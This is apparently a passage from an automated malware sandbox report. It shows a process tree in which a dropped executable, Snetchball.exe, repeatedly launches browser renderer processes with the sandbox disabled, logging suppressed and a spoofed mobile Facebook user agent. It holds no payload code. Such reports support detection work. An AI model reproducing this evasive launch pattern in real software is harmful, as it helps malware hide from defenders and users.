C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3152 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:240 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4036 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1264 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4064 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1076 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3648 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:4488 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3984 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3572 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3808 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3768 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3760 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1436 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4080 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3464 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4100 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1788 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4152 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:5612 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4160 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3856 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4188 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:4060 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:2116 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4160 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:5180 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=1416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:2956 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=1284 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1452 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3996 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3276 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3084 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4160 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:4924 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:4716 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3956 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:3656 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4036 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1792 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:1044 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=4128 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:5064 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3824 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:196 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=4012 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4708
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4276 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2208
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=1108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2096
-
